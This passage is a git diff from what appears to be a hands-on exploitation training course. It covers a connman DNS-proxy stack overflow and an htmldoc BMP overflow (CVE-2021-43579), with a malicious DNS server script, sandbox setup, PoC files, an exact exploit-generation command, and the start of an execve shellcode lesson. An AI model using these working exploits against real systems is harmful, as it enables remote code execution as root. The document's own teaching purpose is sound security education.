vulnerability is in the DNS proxy +component that connman is running by default. A malicious remote DNS server +can attack _connmand_ running as root. + +This is a more complex scenario, because we need to understand a bit about the +DNS protocol and also the vulnerable code section is pretty complex. Also the +test setup is more complex, because we don't really want to mess with our +host's network configuration or let a vulnerable _connmand_ listen to a live +network. + +The upstream repo is at [kernel.org][2]. Version 1.39 still contains the +vulnerability, so `git checkout 1.39` will get you the code you need. + +[2]: https://git.kernel.org/pub/scm/network/connman/connman.git + +Building connman +---------------- + +NOTE: to perform this exercise your test system *must not* use connman itself +for network configuration, otherwise the test _connmand_ and the real +_connmand_ will conflict with each other. + +```sh +# Install required dependencies for building connman +$ sudo zypper in glib2-devel dbus-1-devel libxtables-devel libmnl-devel libgnutls-devel readline-devel + +# Safety check that the system isn't already running connmand in production +$ pgrep connmand >/dev/null && echo "This system already uses connman. This will not work" + +# Clone the upstream repository +$ git clone https://git.kernel.org/pub/scm/network/connman/connman.git + +$ cd connman + +# Checkout the most recent vulnerable version +$ git checkout 1.39 + +# Generate the build system scripts (autotools) +$ ./bootstrap + +# prepare an out-of-tree build +$ mkdir ../build +$ cd ../build + +# We want to install connman locally into an isolated prefix as a regular user. +# We need to specify a couple of install directories explicitly for this to work. +# We will use this $INSTDIR shell variable to refer to the local installation +# dir. This variable is also used by some helper scripts later on. +$ export INSTDIR="$PWD/../install" +$ CFLAGS="-O2 -g -fno-stack-protector" ../connman/configure --prefix="$INSTDIR" \ + --with-dbusconfdir="$INSTDIR/share" \ + --with-dbusdatadir="$INSTDIR/share" \ + --with-tmpfilesdir="$INSTDIR/lib/tmpfiles.d" \ + --with-systemdunitdir="$INSTDIR/share/system.d" +$ make +$ make install + +# Mark the installed binary to get an executable stack +$ execstack -s ../install/sbin/connmand + +# Modify the installed connman D-Bus configuration to allow the unprivileged user +# to register the connmand interface +$ DBUSCONF="$INSTDIR/share/dbus-1/system.d/connman.conf" +$ sed -i "s/user=\"root\"/user=\"$USER\"/g" $DBUSCONF + +# Install the D-Bus configuration into the system +# NOTE: this is the only permanent system change for the connman setup, so if +# you want to clean up later on you should remove this file vom /etc again +$ sudo install -o root -g root -m 0644 "$DBUSCONF" /etc/dbus-1/system.d/ + +# configure connmand not to perform an online check to consider an interface +# on-line +$ mkdir -p "$INSTDIR/etc/connman" +$ echo -e "[General]\nEnableOnlineCheck = false\n" >"$INSTDIR/etc/connman/main.conf" + +# also create some directories connman expects to exist +$ mkdir -p "$INSTDIR/var/lib/connman" +$ mkdir -p "$INSTDIR/var/run/connmand" + +# create a simple configuration file in the example directory to allow scripts +# to find the correct $INSTDIR location. +$ cd ../examples/connman_dns +$ echo "$INSTDIR" >instdir.conf +``` + +Running connman +=============== + +We don't want to run connman as root, especially not this vulnerable version. +By default connman attempts to reconfigure each ethernet interface using DHCP. +That would mess up our the system. connman is pretty stubborn in its +prerequisites. It is not able to run without network administration privileges +or without D-Bus communication. To overcome this, a helper script +`enter_namespace.py` is part of this exercise. This script will employ +container techniques to split off a separate network namespace i.e. a +completely new network stack that is not connected to the host's network +stack. Within this namespace _connmand_ will have full privileges to do what +it wants to do. + +You can open multiple shells inside this forked network namespace by calling +`enter_namespace.py`. The first shell will create the new namespace, then the +following shells will join it. You need to keep the first shell open for this +to work, however. Note that this script also requires the environment +variable `$INSTDIR` from the build section above to be correctly set within +the `instdir.conf` file as explained in the previous section. + +Look around inside the forked namespace e.g. by calling `ip link` to notice +that there is only a loopback network device visible anymore. Because +_connmand_ needs *some* non-loopback device to manage, we create a dummy +device like this: + + $ ./enter_namespace.py + [...] + (network-ns) $ ip link add fake0 type dummy + +This will give us a dummy ethernet device named "fake0". It is connected to +nothing, but _connmand_ can use it as any other ethernet device, send out DHCP +requests and configure IP addresses on it. + +With this prepared we can now launch _connmand_ itself: + + (network-ns) $ $INSTDIR/sbin/connmand -n -i fake0 + +The `-n` parameter is important to keep the daemon running the foreground. In +another shell we now can start the client part of Connman called connmanctl: + + (network-ns) $ $INSTDIR/bin/connmanctl + connmanctl> services + *Ac Wired ethernet_12691abf9fe9_cable + +As shown above the output of the `services` command should show us an entry +for the "fake0" ethernet device we created. + +All further exploit activities have to happen within this forked namespace +i.e. in a shell created via `enter_namespace.py`. + +Exploiting the Issue +==================== + +Since the security issue is in the DNS reverse proxy code of _connmand_ and +can only be triggered from the remote DNS server side, we need to be able to +act as a remote DNS server locally. Connman's DNS reverse proxy listens on +localhost:53 and forwards DNS requests to whatever DNS server is configured. +We therefore use the "fake0" ethernet device to have a "remote" DNS server +listening on it. + +Configure the "fake0" connection using connmanctl like this (you need to +replace the name of the connection with the name you have in your setup, you +can use `` to auto-complete it). + + (network-ns) $ $INSTDIR/bin/connmanctl + connmanctl> config ethernet_12691abf9fe9_cable --ipv4 manual 192.168.1.1 255.255.255.0 + connmanctl> config ethernet_12691abf9fe9_cable --nameservers 192.168.1.1 + connmanctl> config ethernet_12691abf9fe9_cable --domains fake.com + +The `--domains` part is also important, because the security issue can only be +triggered when the fully-qualified domain name logic in the DNS reverse proxy +is involved. + +Another script that is part of this example implements a small part of the DNS +internet procotol to allow acting as the "remote" DNS server. If you are +interested in the details of it then have a look at the [RFC][3]. The overflow +can be triggered via overly long answer records like described in the RFC in +section 3.2.1, 3.2.2, 3.2.4 and 3.4.1 (for an IPv4 address reply which we will +use in our exploit). + +[3]: https://datatracker.ietf.org/doc/html/rfc1035 + +The script is called `connexec.py`. We let it listen on the IP address that is +now assigned to the "fake0" ethernet device. Therefore in a third shell do: + + network-ns: ./connexec.py -l 192.168.1.1 + +In this mode `connexec.py` simply replies with a result of a single IPv4 +address 255.255.255.255 (which is nonsense, of course). We use this mode just +to test whether our DNS reverse proxy setup is acting as intended. For this we +use a fourth shell: + + network-ns: host somwhere. 127.0.0.1 + Using domain server: + Name: 127.0.0.1 + Address: 127.0.0.1#53 + Aliases: + + somehwere has address 255.255.255.255 + somehwere has address 255.255.255.255 + somehwere has address 255.255.255.255 + +This command explicitly contacts the DNS server running on localhost (the DNS +reverse proxy implemented in _connmand_) and asks it to resolve the hostname +"somwhere.". The dot suffix is important, because it triggers the DNS reverse +proxy's domain name qualification logic that contains the security issue. As +we can see from the output, the setup has worked and the reply with IPv4 +address 255.255.255.255 from the `connexec.py` script has reached our DNS +client. + +For sending an actual exploit payload we can pass arbitrary data via the +`--exploit` switch of `connexec.py`. Instead of a harmless reply with an IP +address the script will then return the arbitrary data that will overwrite the +stack buffer. The following _connexec.py_ setup should cause _connmand_ +to simply crash once the DNS query from above is triggered: + + # shell A (DNS server) + (network-ns) $ dd if=/dev/urandom of=./garbage.raw bs=2048 count=1 + (network-ns) $ ./connexec.py -l 192.168.1.1 -x garbage.raw + + # shell B (DNS client) + (network-ns) $ host somehwere. 127.0.0.1 + + # shell C (connmand) + [...] + connmand[18493]: Failed to find URL:http://ipv4.connman.net/online/status.html + connmand[18493]: Aborting (signal 11) [/home/mgerstner/work/install/sbin/connmand] + Segmentation fault (core dumped) + +Thus we now achieved remote denial of service in _connmand_ but not yet remote +code execution. + +--- +**NOTE:** + +Each time you restart `connmand` you will need to reconfigure it using +`connmanctl` as shown at the start of this section. + +--- + +Achieving Full Code Execution +============================= + +Once you reached this stage you can start constructing an actual attack +payload to achieve arbitrary code execution in _connmand_. You need to think +of the following aspects when doing so: + +- _connmand_ not only needs to run in the forked off network namespace but + also in a shell with address space randomization disabled. To do so run + `make shell` in the example directory. +- The overflow happens in source file `dnsproxy.c:1849`. The target overflow + buffer is found in the calling function `forward_dns_reply()`, however, in + `dnsprocy.c:1990`: `char uncompressed[NS_MAXDNAME]`. + The constant `NS_MAXDNAME` is found in system headers and is set to 1025 + bytes. This is the target buffer size we can use for placing our exploit. +- There are no restrictions as to which bytes can appear in the overflow data, + because in `memcpy` there is no termination character like in the `strcpy` + family functions. The length of the data is defined by the DNS message header + field. This means we don't need to take special precautions to avoid certain + bytes in the attack payload. +- Given the large size of the buffer (1024 bytes) and no limits to the attack + data a pretty large program could be executed. For our purposes we will + use the simple 'execve' code snippet from the previous examples, however. +- There is a higher complexity with offsets in this example, because the + start address of the payload that is copied from, is itself not necessarily + aligned. You can use the `--padding-offset` parameter of the + `gen_exploit.py` script to account for that. Try different exploit packets + and look at the resulting overflow data, especially the return address in + the stack frame and the address of the `uncompressed` buffer as well as the + address of `uptr` when the overflow happens. You need to take into account + that the overflow is triggered in the `uncompress()` function but the + vulnerable buffer is in the `forward_dns_reply()` function. Thus the stack + frame of `forward_dns_reply()` will be corrupted, not the stack frame of + `uncompress()`. +- There is a sign extension problem (actually another bug in the networking + code of the DNS proxy) in `dnsproxy.c:1842`. Here `char*` is used as type + for the `uptr` pointer. `char` is a signed type on `x86_64` using GCC. Also + the target variable `dlen` is a signed `int` type. This means that the bit + operation `dlen = uptr[-2] << 8 | uptr[-1]` can become negative e.g. if + `uptr[-1]` has the topmost bit set. You need to make sure that the length of + the exploit buffer results in a bit representation where this negative sign + extension does not occur, otherwise `memcpy` will be called with a negative + length, resulting in an immediate segmentation fault. +- The exact start address of `uncompressed` is not a suitable return address, + because the first couple of bytes return valid DNS protocol data. The first + usable return address will be a higher memory address. Inspect the process + memory after the overflow happens to understand this better. + +Solution +-------- + +In my test setup using the exact command stated here (this means also the same +hostname `somewhere.` and domain `fake.com` to resolve) the following command +line generates the proper exploit that achieves full code execution: + + ./gen_exploit.py -c ../code_injection/execve.bin -e 1600 -s 1000 --padding-offset 4 -o -a 0x7fffffffc9b0 >exploit.bin + +Of course you still need to fill in a suitable address for the `uncompressed` +buffer as is the case for your runtime session. + +Extra Exercises +=============== + +- In the setup proposed above we compiled _connmand_ with optimizations + (compiler flag `-O2`). On `x86_64` this causes nearly all primitive + variables in the functions `forward_dns_reply()` and `uncompress()` to be + placed into registers. What would be different if these variables would be + placed on the stack instead? How would this influence the success chances + for achieving full code execution? Could it offer other attack vectors + instead? +- In a real environment _connmand_ would be executed as a systemd service that + has additional hardenings like `ProtectSystem=full`. How could arbitrary + code execution still proof harmful in this case? diff --git a/examples/connman_dns/connexec.py b/examples/connman_dns/connexec.py new file mode 100755 index 0000000..99ffebb --- /dev/null +++ b/examples/connman_dns/connexec.py @@ -0,0 +1,268 @@ +#!/usr/bin/python3 +# vim: ts=4 et sw=4 sts=4 : + +import argparse +import socket +import struct +import sys + +# Matthias Gerstner +# SUSE Linux GmbH +# matthias.gerstner@suse.com + + +CLASS_IN = 1 # Internet class +RR_TYPE_A = 1 # IPv4 address type + + +class OutMessage: + + def __init__(self): + self.clear() + + def clear(self): + self.m_msg = bytes() + + @classmethod + def getUint32(cls, num): + return struct.pack(">I", num) + + def addUint32(self, num): + self.m_msg += self.getUint32(num) + + def prependUint32(self, num): + self.m_msg = self.getUint32(num) + self.m_msg + + def addInt32(self, num): + self.m_msg += struct.pack(">i", num) + + def addUint16(self, num): + self.m_msg += struct.pack(">H", num) + + def addInt16(self, num): + self.m_msg += struct.pack(">h", num) + + # TLS uses 24-bit "uint24" record length fields not natively supported + # by the Python struct module + def addUint24(self, num): + raw = self.getUint32(num) + self.m_msg += raw[1:4] + + def addUint8(self, num): + self.m_msg += bytes([num]) + + def addInt8(self, num): + self.m_msg += bytes([num]) + + def addLabel(self, s): + self.addUint8(len(s)) + self.addRaw(s.encode()) + + def addRaw(self, bts): + self.m_msg += bts + + def sendMessage(self, sock): + sock.send(self.m_msg) + + +class InMessage: + + def __init__(self, msg): + self.reset() + self.m_msg = msg + self.m_msg_len = len(msg) + + def reset(self): + self.m_msg = bytes() + self.m_msg_len = 0 + self.m_pos = 0 + + def parseUint32(self): + data = self.getNextBytes(4) + return struct.unpack(">I", data)[0] + + def parseInt16(self): + data = self.getNextBytes(2) + return struct.unpack(">h", data)[0] + + def parseUint16(self): + data = self.getNextBytes(2) + return struct.unpack(">H", data)[0] + + def parseUint8(self): + data = self.getNextBytes(1) + return data[0] + + def length(self): + return len(self.m_msg) + + def remainingBytes(self): + return self.length() - self.m_pos + + def getNextBytes(self, num): + assert self.remainingBytes() >= num + data = self.m_msg[self.m_pos:self.m_pos + num] + self.m_pos += num + return data + + def skipBytes(self, num): + assert self.remainingBytes() >= num + self.m_pos += num + + +class ConnExec: + + def __init__(self): + self.m_parser = argparse.ArgumentParser() + self.m_parser.add_argument("-l", "--listen") + self.m_parser.add_argument("-p", "--port", default=53, type=int) + self.m_parser.add_argument("-x", "--exploit", default=None) + + self.m_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + + def run(self): + self.m_args = self.m_parser.parse_args() + + if self.m_args.exploit: + with open(self.m_args.exploit, 'rb') as f: + self.m_exploit = f.read() + if len(self.m_exploit) > (2**16) - 1: + print("Exploit length is too big!") + sys.exit(1) + else: + self.m_exploit = None + self.m_sock.bind((self.m_args.listen, self.m_args.port)) + + while True: + sys.stdout.flush() + packet, peer = self.m_sock.recvfrom(1024) + print("Received", len(packet), "bytes from", peer) + + domain_parts = self.parseReq(packet) + + if len(domain_parts) < 2: + # connman sends two requests, one with the original (short) + # hostname, one with the appended domain. Ignore the sort + # request. + continue + + print("Sending back reply") + reply = self.fixupPacket(InMessage(packet), domain_parts) + self.parseReq(reply) + + self.m_sock.sendto(reply, peer) + + def fixupPacket(self, req, domain_parts): + + reply = OutMessage() + # copy ID + reply.addRaw(req.getNextBytes(2)) + # copy flag fields, set the first bit (query response) + flags = req.parseUint16() + flags |= (1 << 15) + reply.addUint16(flags) + # copy question count + reply.addRaw(req.getNextBytes(2)) + # add answer count of 1 + reply.addUint16(1) + req.skipBytes(2) + # add the rest of the original request + reply.addRaw(req.getNextBytes(req.remainingBytes())) + + # now add the answer record + reply.addLabel(domain_parts[0]) # connman expects the answer to its query here + reply.addLabel("") # root label termination + reply.addUint16(RR_TYPE_A) + reply.addUint16(CLASS_IN) + reply.addUint32(0) # TTL + + if self.m_exploit: + reply.addUint16(len(self.m_exploit)) + reply.addRaw(self.m_exploit) + else: + # add a regular IPv4 reply + reply.addUint16(4) # length of RDATA + reply.addUint32(0xFFFFFFFF) # 255.255.255.255 + + return reply.m_msg + + def parseReq(self, packet): + domain_parts = [] + msg = InMessage(packet) + id = msg.parseUint16() + flags = msg.parseUint16() + + print("ID =", id) + print("Flags =", hex(flags)) + if flags & 0x8000: + print("type: response") + else: + print("type: query") + opcode = (flags & 0x1e) >> 1 + if opcode == 0: + print("standard query") + elif opcode == 1: + print("iquery") + elif opcode == 2: + print("status request") + else: + print("unknown opcode") + + aa = flags & 0x20 + print("authoritative:", aa) + + counts = {} + + for label in ("QD", "AN", "NS", "AR"): + count = msg.parseUint16() + counts[label] = count + print(f"{label}count:", count) + + for nr in range(counts["QD"]): + print("QD record", nr) + length = 1 + while length != 0: + length = msg.parseUint8() + print("Qname length:", length) + name = msg.getNextBytes(length) + if length: + name = name.decode() + print("Qname:", name) + domain_parts.append(name) + + qtype = msg.parseUint16() + qclass = msg.parseUint16() + + print("QType:", qtype) + print("QClass:", qclass) + + for nr in range(counts["AN"]): + print("AN record", nr) + length = 1 + while length != 0: + length = msg.parseUint8() + print("Name length:", length) + name = msg.getNextBytes(length) + if length: + name = name.decode() + print("Name:", name) + + an_type = msg.parseUint16() + an_class = msg.parseUint16() + ttl = msg.parseUint32() + rdlength = msg.parseUint16() + + print("ANType:", an_type) + print("ANClass:", an_class) + print("TTL:", ttl) + print("RDLength:", rdlength) + + print("Bytes left:", msg.remainingBytes()) + + print("\n\n") + return domain_parts + + +if __name__ == '__main__': + conn_exec = ConnExec() + conn_exec.run() diff --git a/examples/connman_dns/enter_namespace.py b/examples/connman_dns/enter_namespace.py new file mode 100755 index 0000000..33a19d4 --- /dev/null +++ b/examples/connman_dns/enter_namespace.py @@ -0,0 +1,92 @@ +#!/usr/bin/python3 +import argparse +import os +import subprocess +import sys +from pathlib import Path + +# Matthias Gerstner +# SUSE Linux GmbH +# matthias.gerstner@suse.com + + +def eprint(*args, **kwargs): + kwargs['file'] = sys.stderr + print(*args, **kwargs) + + +parser = argparse.ArgumentParser(description="Manages execution of a split-off network namespace for safely running connmand and exploiting it.") +parser.add_argument("--reexec", action='store_true') +parser.add_argument("--join", action='store_true') + +args = parser.parse_args() + +this_script = Path(__file__).absolute() +script_dir = this_script.parent +# Running D-Bus in a separate user namespace doesn't work out, because the +# user ID doesn't match the user ID in the root namespace. Lie to D-Bus about +# our real and effective user IDs using an ld-preload library. +preload = script_dir / "geteuid-preload/libgeteuid_preload.so" +instdir_conf = script_dir / "instdir.conf" + +if not instdir_conf.exists(): + eprint(f"Expected location of connmand $INSTDIR in {str(instdir_conf)}") + sys.exit(1) + +instdir = Path(open(instdir_conf).read().strip()) +connmand = instdir / "sbin/connmand" + +if not instdir.is_dir() or not connmand.exists(): + eprint(f"{instdir} or {connmand} do not exist") + sys.exit(1) + +# export it into the environment to make example command lines from the +# README.md work as expected +os.environ["INSTDIR"] = str(instdir) + +if not preload.exists(): + print("Building LD_PRELOAD helper lib\n") + subprocess.check_call(["make"], cwd=script_dir) + print() + +ns_pidfile = instdir / "var" / "netns.pid" + +if args.reexec: + child_env = os.environ.copy() + child_env["IN_NS_NAMESPACE"] = "1" + child_env["LD_PRELOAD"] = str(preload) + shell = os.environ["SHELL"] + child_env["PS1"] = r"(network-ns) \u@\h:\w> " + if not args.join: + with open(ns_pidfile, 'w') as ns_fd: + ns_fd.write(str(os.getpid())) + # we need to mount our forked-off sysfs to reflect our network + # namespace there correctly + subprocess.check_call("mount -t sysfs none /sys".split()) + # fire up our new loopback device + subprocess.check_call("ip link set up dev lo".split()) + os.execve(shell, [shell], child_env) + +if "IN_NS_NAMESPACE" in os.environ: + eprint("You are already in a private network namespace") + sys.exit(1) + +if ns_pidfile.exists(): + with open(ns_pidfile, 'r') as ns_fd: + ns_pid = ns_fd.read().strip() + + if os.path.isdir(f"/proc/{ns_pid}"): + print("Joining existing namespace from PID", ns_pid) + cmdline = ["nsenter", "-n", "-U", "-m", "-t", ns_pid, f"--wd={os.getcwd()}", "--preserve-credentials", "--", this_script, "--reexec", "--join"] + os.execve("/usr/bin/nsenter", cmdline, os.environ) + else: + eprint("Stale NS PID", ns_pid, "found. Removing it.") + ns_pidfile.unlink() + +if os.geteuid() == 0: + eprint("It seems you are already root. The test setup should be created as a regular user") + sys.exit(1) + +print("Creating new network namespace") +cmdline = ["unshare", "-n", "-U", "-m", "-r", "--", this_script, "--reexec"] +os.execve("/usr/bin/unshare", cmdline, os.environ) diff --git a/examples/connman_dns/gen_exploit.py b/examples/connman_dns/gen_exploit.py new file mode 120000 index 0000000..38e9728 --- /dev/null +++ b/examples/connman_dns/gen_exploit.py @@ -0,0 +1 @@ +../soupstrike/gen_exploit.py \ No newline at end of file diff --git a/examples/connman_dns/geteuid-preload/geteuid.c b/examples/connman_dns/geteuid-preload/geteuid.c new file mode 100644 index 0000000..4f2c7f1 --- /dev/null +++ b/examples/connman_dns/geteuid-preload/geteuid.c @@ -0,0 +1,19 @@ +#include + +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + */ + +#ifndef REAL_USER_ID +# error "you need to define REAL_USER_ID to the value of `id -u`" +#endif + +uid_t geteuid() { + return REAL_USER_ID; +} + +uid_t getuid() { + return REAL_USER_ID; +} diff --git a/examples/doc2exploit/README.md b/examples/doc2exploit/README.md new file mode 100644 index 0000000..22deccd --- /dev/null +++ b/examples/doc2exploit/README.md @@ -0,0 +1,202 @@ +A real-world vulnerability in `htmldoc` +======================================= + +`htmldoc` is a utility to convert HTML documents to PDF and other target +formats. A larger number of vulnerabilities have been found in the tool over +time, not too long ago a very simple stack buffer overflow which we will +exploit here. + +The vulnerability was handled in [bsc#1194487][1], CVE-2021-43579. + +[1]: https://bugzilla.suse.com/show_bug.cgi?id=1194487 + +The issue was found in the parsing of BMP image file data which can be +referenced in HTML input sources. The issue was [reported][2] upstream. + +[2]: https://github.com/michaelrsweet/htmldoc/issues/453 + +In the report we can also find a `poc.zip` file that demonstrates the issue. + +Building the Vulnerable Version +------------------------------- + +The issue was fixed in version v1.9.13, thus we need to obtain one version +before that. + +```sh +$ git clone https://github.com/michaelrsweet/htmldoc.git +$ cd htmldoc +$ git checkout v1.9.12 +``` + +For building we require a number of devel packages. For some reason building +without GUI support is broken, so we have to deal with all that GUI stuff: + +```sh +$ sudo zypper in fltk-devel libjpeg8-devel libpng16-devel +``` + +Apply the following patch to `Makedefs.in` to get verbose compiler +invocations, otherwise we won't see what is going on: + +``` +diff --git a/Makedefs.in b/Makedefs.in +index 596e4b0..210df57 100644 +--- a/Makedefs.in ++++ b/Makedefs.in +@@ -86,7 +86,9 @@ WARNINGS = @WARNINGS@ + .SUFFIXES: .a .c .cxx .h .o + .c.o: + echo Compiling $<... ++ echo $(CC) $(CPPFLAGS) $(CFLAGS) -c $< + $(CC) $(CPPFLAGS) $(CFLAGS) -c $< + .cxx.o: + echo Compiling $<... ++ echo $(CXX) $(CPPFLAGS) $(CXXFLAGS) -c $< + $(CXX) $(CPPFLAGS) $(CXXFLAGS) -c $< +``` + +Also remove the two hard coded CFLAG settings mentioning `_FORTIFY_SOURCE` in +"configure.ac": + +``` +diff --git a/configure.ac b/configure.ac +index 82315b8..c84cba2 100644 +--- a/configure.ac ++++ b/configure.ac +@@ -341,8 +341,8 @@ AS_IF([test -n "$GXX"], [ + ], [ + # Otherwise use the Fortify enhancements to catch any unbounded + # string operations... +- CFLAGS="$CFLAGS -D_FORTIFY_SOURCE=2" +- CXXFLAGS="$CXXFLAGS -D_FORTIFY_SOURCE=2" ++ CFLAGS="$CFLAGS" ++ CXXFLAGS="$CXXFLAGS" + ]) + + dnl Set optimization flags... +``` + +Now let's actually build: + +```sh +$ autoreconf +$ ./configure --with-gui +$ make +``` + +Finally mark the resulting executable with `execstack`: + + execstack -s ./htmldoc/htmldoc + +Testing the Proof of Concept (PoC) +---------------------------------- + +In the example's subdirectory `poc` you can find the PoC files provided by the +upstream reporter. Let's first check whether this crashes the program as +expected. Before doing so inspect the PoC files, though. We don't want to +execute potential exploit code blindly. Look at the HTML file and at `xxd +poc.bmp` to better understand the content of the PoC. + +Finally test the PoC works like this: + +```sh +$ ./htmldoc/htmldoc -f poc.pdf /path/to/poc.html +ERR005: Unable to open psglyphs data file! +ERR005: Unable to open character set file iso-8859-1! +Segmentation fault (core dumped) +``` + +You should see similar output to above that shows that process aborts with a +segmentation fault. + +Investigating the Vulnerable Function +------------------------------------- + +The problem is found in the function `image_load_bmp()` when the logic +attempts to fill the `colormap` buffer, which is one kilobyte in size. +What the vulnerable function attempts to do is parsing the BMP input file. +Find a description of the BMP header binary format [here][3] or [here][4]. + +[3]: http://www.ece.ualberta.ca/~elliott/ee552/studentAppNotes/2003_w/misc/bmp_file_format/bmp_file_format.htm +[4]: https://cdn.hackaday.io/files/274271173436768/Simplified%20Windows%20BMP%20Bitmap%20File%20Format%20Specification.htm + +The file `bmp.txt` which accompanies this example also gives a short overview +of the individual bytes that are part of the `poc.bmp`. From all this +information we can learn that the relevant bytes of the BMP header to trigger +this exploit are the first 54 bytes, which we can extract from the `poc.bmp` +file as follows: + +```sh +$ dd if=./poc/poc.bmp of=header.bmp bs=1 count=54 +``` + +For creating a fully functional exploit we just need to concatenate this +`header.bmp` and the actual exploit buffer that you can create using the +`gen_exploit.py` helper script. + +Finding out the Return Address +------------------------------ + +Invoke a shell using + + setarch `uname -m` -R /bin/bash + +and run the PoC against htmldoc as described above, but while running +`htmldoc` in gdb. Set a breakpoint in `image_load_bmp()` and get the address +for the `colormap` buffer. + +When looking at the context more closely you will notice special circumstances +(see below). The buffers found in `image_load()` are also relevant for the +overflow. The `image_t key` stack variable is also over one kilobyte in size. +Thus over two kilobytes of data can and need to be supplied before we will +reach the actual return address of the stack frame. + +Special Circumstances of this Vulnerability +------------------------------------------- + +This program has a number of specialities that are worth noting: + +- The project has a mixture of C and C++ code. The vulnerability is in a C++ + unit. The code present there isn't really using much C++ features though, it + looks mostly like C. Probably is was turned into a C++ unit for a few + features but otherwise left untouched. +- `gdb` tells us (via `info frame`) that the vulnerable function's stack frame + is *inlined* into the parent function's frame. This results from an + optimization the compiler has performed, the two functions have been merged, + so to say. Thus the stack variables of both functions have to be considered + for the same stack frame. +- Due to this more than 2 Kilobytes of stack data needs to be overwritten to + reach the return address. +- The problematic use of the `fread()` function does not impose any limits + regarding terminators thus an attacker does not have to worry which kind of + data the exploit contains. +- A number of pointer parameters that are also present in the vulnerable + function's context are placed in registers, which is important, because + otherwise dereferencing them (after overwriting them) would break the + exploit. Especially note the `image_t *img` pointer parameter in this regard. + +Creating a Fully Working Exploit +-------------------------------- + +From all information gathered so far create an exploit buffer using the +`gen_exploit.py` script. Concatenate the relevant header part of the BMP image +and the exploit buffer to obtain a crafted BMP: + + $ cat header.bmp doc_exploit.bin >exploit.bmp + +You now need to create a copy of the `poc.html` named `exploit.html` and +adjust the bmp include in it to include the `exploit.bmp` instead. + +Now you can feed the `exploit.html` to htmldoc and test with different return +addresses in the exploit buffer until the shell execution works as intended. + +Exercises +--------- + +- Look at the vulnerable BMP parsing code in htmldoc in more detail. What + would you say about the code quality? What could be improved? +- Looking at the properties of this stack buffer overflow would you say it is + good to exploit? How much degree of freedrom does an attacker have? + + diff --git a/examples/doc2exploit/bmp.txt b/examples/doc2exploit/bmp.txt new file mode 100644 index 0000000..0e34031 --- /dev/null +++ b/examples/doc2exploit/bmp.txt @@ -0,0 +1,15 @@ +00000000: 424d 0000 0000 0000 0000 0000 0000 0000 BM.............. + B M SIZE SIZE RESV RESV OFFS OFFS HDSZ +00000010: 0000 0100 0000 0100 0000 0000 0100 0000 ................ + HDSZ WDTH WDTH HGTH HGTH CLPN BITS COMP +00000020: 0000 0000 0000 0000 0000 0000 0000 0010 ................ + COMP SIZE SIZE HPPM HPPM VPPM VPPM NMCL +00000030: 0000 0000 0000 4141 4141 4141 4141 4141 ......AAAAAAAAAA + NMCL IMPC IMPC +00000040: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA +00000050: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA +00000060: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA +00000070: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA +00000080: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA +00000090: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA + diff --git a/examples/doc2exploit/gen_exploit.py b/examples/doc2exploit/gen_exploit.py new file mode 120000 index 0000000..1d3e2fd --- /dev/null +++ b/examples/doc2exploit/gen_exploit.py @@ -0,0 +1 @@ +../code_injection/gen_exploit.py \ No newline at end of file diff --git a/examples/doc2exploit/poc/poc.bmp b/examples/doc2exploit/poc/poc.bmp new file mode 100644 index 0000000000000000000000000000000000000000..99366cc2063df00e5f6a14caeb3ce515eb93162e GIT binary patch literal 16442 zcmeI)u?+wq2n0agz?GzT|8+!-jSJWu37@CE0f + + +

. + + + + diff --git a/examples/exec_snippet/.gitignore b/examples/exec_snippet/.gitignore new file mode 100644 index 0000000..4e72e44 --- /dev/null +++ b/examples/exec_snippet/.gitignore @@ -0,0 +1 @@ +exec_asm_mprotect diff --git a/examples/exec_snippet/Makefile b/examples/exec_snippet/Makefile new file mode 100644 index 0000000..d8e3b42 --- /dev/null +++ b/examples/exec_snippet/Makefile @@ -0,0 +1,14 @@ +BINS=exec_asm exec_bin +EXTRA_BINS=exec_asm_mprotect +all: $(BINS) + +exec_asm: exec_asm.c + gcc -g $< -o $@ + execstack -s $@ || rm $@ + +exec_bin: exec_bin.c + gcc -g $< -o $@ + execstack -s $@ || rm $@ + +clean: + rm -f *.o $(BINS) $(EXTRA_BINS) diff --git a/examples/exec_snippet/README.md b/examples/exec_snippet/README.md new file mode 100644 index 0000000..053e7cb --- /dev/null +++ b/examples/exec_snippet/README.md @@ -0,0 +1,46 @@ +Dissecting the execve() System Call +=================================== + +Similar to what we did in the previous example `exit_snippet` for the +`exit()` system call we now want to extract a piece of machine code that +executes the `execve()` system call with parameters set for starting `/bin/sh` +i.e. a new shell. + +Because we need to provide pointers to strings and arrays of strings the setup +of self contained code is not so easy this time. We are triggering the system +call using the `x86_64` `syscall` instruction and register sets this time. + +The assembler code also embeds a string for '/bin/sh'. But we won't know at +which address this string will be located during runtime. The current +instruction pointer from register `rip` also cannot be directly accessed due +to limitations of the instruction set. + +We are exploiting the `jmp` and `call` instructions to overcome this +limitation. `jmp` allows to specify a relative address where to continue +code execution. The same is true for the `call` instruction, but interestingly +it also pushes the return address of the next instruction on the stack. The +`call` instruction is the sibbling of the `ret` instruction to help +implementing function calls. By combining `jmp` and `call` we can obtain the +memory address of the '/bin/sh' string during runtime in a reliable way, +without knowing any absolute addresses in advance. + +Simlar to the `exit_snippet` example we have a file `exec_asm.c` which +contains inline assembler doing what we want. The extracted raw machine +instructions making up the self contained `execve()` code for '/bin/sh' is +then found in `exec_bin.c` for testing. + +Because this code is self modifiying we can't by default run it in the version +contained in `exec_asm.c`, because the text segment is by default read-only. +The `Makefile` contains directives for making the .text segment writeable to +overcome this security feature for testing purposes. + +Exercises +========= + +- Try to read the assembler code carefully for understanding what is going on + here. +- You can extract the machine code from `exec_asm` similar to what we did in + the `exit_snippet` example. +- Run the `exec_bin.c` program and step until the syscall assembler + instruction is about to be executed. Inspect the register values and memory + locations we're pointing to for seeing the result of the code in action. diff --git a/examples/exec_snippet/exec_asm.c b/examples/exec_snippet/exec_asm.c new file mode 100644 index 0000000..84a3ecc --- /dev/null +++ b/examples/exec_snippet/exec_asm.c @@ -0,0 +1,118 @@ +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + */ + 